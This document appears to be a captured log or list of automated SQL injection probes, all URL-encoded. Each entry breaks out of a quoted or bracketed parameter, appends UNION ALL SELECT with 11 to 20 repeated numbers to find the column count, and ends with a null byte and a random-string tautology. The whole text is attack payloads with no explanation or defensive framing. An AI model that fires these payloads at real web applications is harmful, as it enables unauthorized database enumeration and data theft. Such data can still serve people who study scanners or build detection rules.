-1553%27%29%29%29%20UNION%20ALL%20SELECT%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%2C%206480%00%20AND%20%28%28%28%27BoCV%27%3D%27BoCV -8173%27%29%29%29%20UNION%20ALL%20SELECT%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%00%20AND%20%28%28%28%27sFmL%27%3D%27sFmL -1352%27%29%29%29%20UNION%20ALL%20SELECT%205820%2C%205820%2C%205820%2C%205820%2C%205820%2C%205820%2C%205820%2C%205820%2C%205820%2C%205820%2C%205820%2C%205820%2C%205820%2C%205820%00%20AND%20%28%28%28%27RUft%27%3D%27RUft -7447%27%29%29%29%20UNION%20ALL%20SELECT%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%2C%202932%00%20AND%20%28%28%28%27yQaN%27%3D%27yQaN -3631%27%29%29%29%20UNION%20ALL%20SELECT%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%2C%203640%00%20AND%20%28%28%28%27fxxx%27%3D%27fxxx -4270%27%29%29%29%20UNION%20ALL%20SELECT%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%00%20AND%20%28%28%28%27ydJU%27%3D%27ydJU -3357%27%29%29%29%20UNION%20ALL%20SELECT%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%2C%203863%00%20AND%20%28%28%28%27NskH%27%3D%27NskH -4668%27%29%29%29%20UNION%20ALL%20SELECT%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%00%20AND%20%28%28%28%27Wflp%27%3D%27Wflp -6066%27%29%29%29%20UNION%20ALL%20SELECT%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%2C%205270%00%20AND%20%28%28%28%27EVrF%27%3D%27EVrF -9569%27%20UNION%20ALL%20SELECT%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%00%20AND%20%27pxUq%27%3D%27pxUq -6993%27%20UNION%20ALL%20SELECT%203538%2C%203538%2C%203538%2C%203538%2C%203538%2C%203538%2C%203538%2C%203538%2C%203538%2C%203538%2C%203538%2C%203538%00%20AND%20%27OiFg%27%3D%27OiFg -9763%27%20UNION%20ALL%20SELECT%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%00%20AND%20%27Efrv%27%3D%27Efrv -2302%27%20UNION%20ALL%20SELECT%203818%2C%203818%2C%203818%2C%203818%2C%203818%2C%203818%2C%203818%2C%203818%2C%203818%2C%203818%2C%203818%2C%203818%2C%203818%2C%203818%00%20AND%20%27foLv%27%3D%27foLv -8075%27%20UNION%20ALL%20SELECT%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%00%20AND%20%27SqHk%27%3D%27SqHk -1216%27%20UNION%20ALL%20SELECT%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%00%20AND%20%27WykL%27%3D%27WykL -6391%27%20UNION%20ALL%20SELECT%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%2C%205916%00%20AND%20%27uUtY%27%3D%27uUtY -8023%27%20UNION%20ALL%20SELECT%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%00%20AND%20%27jXpq%27%3D%27jXpq -4147%27%20UNION%20ALL%20SELECT%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%2C%208727%00%20AND%20%27BWGS%27%3D%27BWGS -5690%27%20UNION%20ALL%20SELECT%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%2C%203381%00%20AND%20%27UmfV%27%3D%27UmfV -6311%27%29%20UNION%20ALL%20SELECT%207065%2C%207065%2C%207065%2C%207065%2C%207065%2C%207065%2C%207065%2C%207065%2C%207065%2C%207065%2C%207065%00%20AND%20%28%27FhRO%27%20LIKE%20%27FhRO -3527%27%29%20UNION%20ALL%20SELECT%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%2C%203274%00%20AND%20%28%27IWuo%27%20LIKE%20%27IWuo -3331%27%29%20UNION%20ALL%20SELECT%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%00%20AND%20%28%27fwwV%27%20LIKE%20%27fwwV -2780%27%29%20UNION%20ALL%20SELECT%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%00%20AND%20%28%27oLbF%27%20LIKE%20%27oLbF -3236%27%29%20UNION%20ALL%20SELECT%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%00%20AND%20%28%27KhoD%27%20LIKE%20%27KhoD -1900%27%29%20UNION%20ALL%20SELECT%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%2C%207439%00%20AND%20%28%27yvsB%27%20LIKE%20%27yvsB -3867%27%29%20UNION%20ALL%20SELECT%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%00%20AND%20%28%27CEaN%27%20LIKE%20%27CEaN -5504%27%29%20UNION%20ALL%20SELECT%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%00%20AND%20%28%27UsrF%27%20LIKE%20%27UsrF -3982%27%29%20UNION%20ALL%20SELECT%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%00%20AND%20%28%27FOlL%27%20LIKE%20%27FOlL -7031%27%29%20UNION%20ALL%20SELECT%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%2C%208430%00%20AND%20%28%27qOHZ%27%20LIKE%20%27qOHZ -6770%27%29%29%20UNION%20ALL%20SELECT%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%00%20AND%20%28%28%27uRXm%27%20LIKE%20%27uRXm -5337%27%29%29%20UNION%20ALL%20SELECT%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%2C%208713%00%20AND%20%28%28%27CRnR%27%20LIKE%20%27CRnR -5424%27%29%29%20UNION%20ALL%20SELECT%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%00%20AND%20%28%28%27GvxF%27%20LIKE%20%27GvxF -9150%27%29%29%20UNION%20ALL%20SELECT%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%00%20AND%20%28%28%27teuL%27%20LIKE%20%27teuL -3874%27%29%29%20UNION%20ALL%20SELECT%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%2C%203507%00%20AND%20%28%28%27QRop%27%20LIKE%20%27QRop -4253%27%29%29%20UNION%20ALL%20SELECT%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%2C%202736%00%20AND%20%28%28%27LMAk%27%20LIKE%20%27LMAk -1273%27%29%29%20UNION%20ALL%20SELECT%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%2C%201906%00%20AND%20%28%28%27ejzv%27%20LIKE%20%27ejzv -3176%27%29%29%20UNION%20ALL%20SELECT%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%2C%206532%00%20AND%20%28%28%27sQuM%27%20LIKE%20%27sQuM -1721%27%29%29%20UNION%20ALL%20SELECT%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%00%20AND%20%28%28%27Uyrt%27%20LIKE%20%27Uyrt -5605%27%29%29%20UNION%20ALL%20SELECT%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%2C%204239%00%20AND%20%28%28%27WwRe%27%20LIKE%20%27WwRe -6089%27%29%29%29%20UNION%20ALL%20SELECT%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%00%20AND%20%28%28%28%27gPVR%27%20LIKE%20%27gPVR -9036%27%29%29%29%20UNION%20ALL%20SELECT%202584%2C%202584%2C%202584%2C%202584%2C%202584%2C%202584%2C%202584%2C%202584%2C%202584%2C%202584%2C%202584%2C%202584%00%20AND%20%28%28%28%27IRnS%27%20LIKE%20%27IRnS -8545%27%29%29%29%20UNION%20ALL%20SELECT%206392%2C%206392%2C%206392%2C%206392%2C%206392%2C%206392%2C%206392%2C%206392%2C%206392%2C%206392%2C%206392%2C%206392%2C%206392%00%20AND%20%28%28%28%27cCDK%27%20LIKE%20%27cCDK -6803%27%29%29%29%20UNION%20ALL%20SELECT%206462%2C%206462%2C%206462%2C%206462%2C%206462%2C%206462%2C%206462%2C%206462%2C%206462%2C%206462%2C%206462%2C%206462%2C%206462%2C%206462%00%20AND%20%28%28%28%27fFYj%27%20LIKE%20%27fFYj -3998%27%29%29%29%20UNION%20ALL%20SELECT%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%2C%204424%00%20AND%20%28%28%28%27IoAl%27%20LIKE%20%27IoAl -6065%27%29%29%29%20UNION%20ALL%20SELECT%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%00%20AND%20%28%28%28%27cpuu%27%20LIKE%20%27cpuu -3797%27%29%29%29%20UNION%20ALL%20SELECT%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%00%20AND%20%28%28%28%27cvIJ%27%20LIKE%20%27cvIJ -9317%27%29%29%29%20UNION%20ALL%20SELECT%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%00%20AND%20%28%28%28%27RVRU%27%20LIKE%20%27RVRU -5476%27%29%29%29%20UNION%20ALL%20SELECT%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%00%20AND%20%28%28%28%27eIVk%27%20LIKE%20%27eIVk -3646%27%29%29%29%20UNION%20ALL%20SELECT%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%00%20AND%20%28%28%28%27gthL%27%20LIKE%20%27gthL -5239%27%20UNION%20ALL%20SELECT%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%00%20AND%20%27NCTR%27%20LIKE%20%27NCTR -8760%27%20UNION%20ALL%20SELECT%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%00%20AND%20%27sPln%27%20LIKE%20%27sPln -6651%27%20UNION%20ALL%20SELECT%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%00%20AND%20%27WJGP%27%20LIKE%20%27WJGP -9286%27%20UNION%20ALL%20SELECT%208651%2C%208651%2C%208651%2C%208651%2C%208651%2C%208651%2C%208651%2C%208651%2C%208651%2C%208651%2C%208651%2C%208651%2C%208651%2C%208651%00%20AND%20%27pDIW%27%20LIKE%20%27pDIW -8770%27%20UNION%20ALL%20SELECT%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%2C%205682%00%20AND%20%27zGXh%27%20LIKE%20%27zGXh -8114%27%20UNION%20ALL%20SELECT%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%00%20AND%20%27hTFN%27%20LIKE%20%27hTFN -2939%27%20UNION%20ALL%20SELECT%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%00%20AND%20%27thzf%27%20LIKE%20%27thzf -6575%27%20UNION%20ALL%20SELECT%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%00%20AND%20%27QLuK%27%20LIKE%20%27QLuK -5468%27%20UNION%20ALL%20SELECT%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%00%20AND%20%27peGQ%27%20LIKE%20%27peGQ -4104%27%20UNION%20ALL%20SELECT%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425%00%20AND%20%27ljmh%27%20LIKE%20%27ljmh -9230%22%29%20UNION%20ALL%20SELECT%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%00%20AND%20%28%22ySnJ%22%3D%22ySnJ -3010%22%29%20UNION%20ALL%20SELECT%209052%2C%209052%2C%209052%2C%209052%2C%209052%2C%209052%2C%209052%2C%209052%2C%209052%2C%209052%2C%209052%2C%209052%00%20AND%20%28%22KAuA%22%3D%22KAuA -3376%22%29%20UNION%20ALL%20SELECT%203429%2C%203429%2C%203429%2C%203429%2C%203429%2C%203429%2C%203429%2C%203429%2C%203429%2C%203429%2C%203429%2C%203429%2C%203429%00%20AND%20%28%22GClS%22%3D%22GClS -6604%22%29%20UNION%20ALL%20SELECT%202038%2C%202038%2C%202038%2C%202038%2C%202038%2C%202038%2C%202038%2C%202038%2C%202038%2C%202038%2C%202038%2C%202038%2C%202038%2C%202038%00%20AND%20%28%22bYTQ%22%3D%22bYTQ -7095%22%29%20UNION%20ALL%20SELECT%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%00%20AND%20%28%22omVB%22%3D%22omVB -6623%22%29%20UNION%20ALL%20SELECT%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%2C%208361%00%20AND%20%28%22FklA%22%3D%22FklA -6086%22%29%20UNION%20ALL%20SELECT%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%2C%205301%00%20AND%20%28%22aZlk%22%3D%22aZlk -6132%22%29%20UNION%20ALL%20SELECT%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%00%20AND%20%28%22betp%22%3D%22betp -3318%22%29%20UNION%20ALL%20SELECT%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%00%20AND%20%28%22AXGx%22%3D%22AXGx -1367%22%29%20UNION%20ALL%20SELECT%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%00%20AND%20%28%22MDTA%22%3D%22MDTA -4010%22%29%29%20UNION%20ALL%20SELECT%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%00%20AND%20%28%28%22Yvxd%22%3D%22Yvxd -8641%22%29%29%20UNION%20ALL%20SELECT%207208%2C%207208%2C%207208%2C%207208%2C%207208%2C%207208%2C%207208%2C%207208%2C%207208%2C%207208%2C%207208%2C%207208%00%20AND%20%28%28%22zEft%22%3D%22zEft -1019%22%29%29%20UNION%20ALL%20SELECT%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%00%20AND%20%28%28%22LFUJ%22%3D%22LFUJ -9670%22%29%29%20UNION%20ALL%20SELECT%208304%2C%208304%2C%208304%2C%208304%2C%208304%2C%208304%2C%208304%2C%208304%2C%208304%2C%208304%2C%208304%2C%208304%2C%208304%2C%208304%00%20AND%20%28%28%22kTaD%22%3D%22kTaD -1608%22%29%29%20UNION%20ALL%20SELECT%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%00%20AND%20%28%28%22cIRZ%22%3D%22cIRZ -8977%22%29%29%20UNION%20ALL%20SELECT%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%00%20AND%20%28%28%22QOtu%22%3D%22QOtu -3249%22%29%29%20UNION%20ALL%20SELECT%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%2C%208410%00%20AND%20%28%28%22EGOB%22%3D%22EGOB -9560%22%29%29%20UNION%20ALL%20SELECT%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%00%20AND%20%28%28%22xiQp%22%3D%22xiQp -4095%22%29%29%20UNION%20ALL%20SELECT%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%00%20AND%20%28%28%22AoxG%22%3D%22AoxG -2196%22%29%29%20UNION%20ALL%20SELECT%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%2C%208591%00%20AND%20%28%28%22bFML%22%3D%22bFML -4356%22%29%29%29%20UNION%20ALL%20SELECT%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%00%20AND%20%28%28%28%22Vobn%22%3D%22Vobn -5711%22%29%29%29%20UNION%20ALL%20SELECT%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%00%20AND%20%28%28%28%22soai%22%3D%22soai -4396%22%29%29%29%20UNION%20ALL%20SELECT%206471%2C%206471%2C%206471%2C%206471%2C%206471%2C%206471%2C%206471%2C%206471%2C%206471%2C%206471%2C%206471%2C%206471%2C%206471%00%20AND%20%28%28%28%22ltvt%22%3D%22ltvt -5077%22%29%29%29%20UNION%20ALL%20SELECT%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%00%20AND%20%28%28%28%22Ccfd%22%3D%22Ccfd -1994%22%29%29%29%20UNION%20ALL%20SELECT%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%2C%203695%00%20AND%20%28%28%28%22tHlS%22%3D%22tHlS -2682%22%29%29%29%20UNION%20ALL%20SELECT%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%2C%209020%00%20AND%20%28%28%28%22yhES%22%3D%22yhES -1649%22%29%29%29%20UNION%20ALL%20SELECT%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%2C%204986%00%20AND%20%28%28%28%22aStZ%22%3D%22aStZ -6941%22%29%29%29%20UNION%20ALL%20SELECT%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%2C%206258%00%20AND%20%28%28%28%22uaOP%22%3D%22uaOP -6909%22%29%29%29%20UNION%20ALL%20SELECT%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%2C%206133%00%20AND%20%28%28%28%22RVja%22%3D%22RVja -4449%22%29%29%29%20UNION%20ALL%20SELECT%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%00%20AND%20%28%28%28%22FrFb%22%3D%22FrFb -4502%22%20UNION%20ALL%20SELECT%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%00%20AND%20%22moev%22%3D%22moev -8160%22%20UNION%20ALL%20SELECT%209062%2C%209062%2C%209062%2C%209062%2C%209062%2C%209062%2C%209062%2C%209062%2C%209062%2C%209062%2C%209062%2C%209062%00%20AND%20%22NuaV%22%3D%22NuaV -4083%22%20UNION%20ALL%20SELECT%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%00%20AND%20%22OdMm%22%3D%22OdMm -9842%22%20UNION%20ALL%20SELECT%202742%2C%202742%2C%202742%2C%202742%2C%202742%2C%202742%2C%202742%2C%202742%2C%202742%2C%202742%2C%202742%2C%202742%2C%202742%2C%202742%00%20AND%20%22ygLO%22%3D%22ygLO -5309%22%20UNION%20ALL%20SELECT%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%00%20AND%20%22AYBS%22%3D%22AYBS -9258%22%20UNION%20ALL%20SELECT%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%2C%204386%00%20AND%20%22CzGa%22%3D%22CzGa -9516%22%20UNION%20ALL%20SELECT%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%00%20AND%20%22rnVw%22%3D%22rnVw -5765%22%20UNION%20ALL%20SELECT%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%00%20AND%20%22EetL%22%3D%22EetL -2450%22%20UNION%20ALL%20SELECT%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%2C%202236%00%20AND%20%22FXqn%22%3D%22FXqn -3328%22%20UNION%20ALL%20SELECT%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%00%20AND%20%22HBDO%22%3D%22HBDO -2699%22%29%20UNION%20ALL%20SELECT%202337%2C%202337%2C%202337%2C%202337%2C%202337%2C%202337%2C%202337%2C%202337%2C%202337%2C%202337%2C%202337%00%20AND%20%28%22Kbzh%22%20LIKE%20%22Kbzh -4768%22%29%20UNION%20ALL%20SELECT%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%00%20AND%20%28%22mMOo%22%20LIKE%20%22mMOo -5584%22%29%20UNION%20ALL%20SELECT%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%00%20AND%20%28%22PLmb%22%20LIKE%20%22PLmb -6423%22%29%20UNION%20ALL%20SELECT%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%00%20AND%20%28%22ydjS%22%20LIKE%20%22ydjS -2978%22%29%20UNION%20ALL%20SELECT%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%00%20AND%20%28%22Ymse%22%20LIKE%20%22Ymse 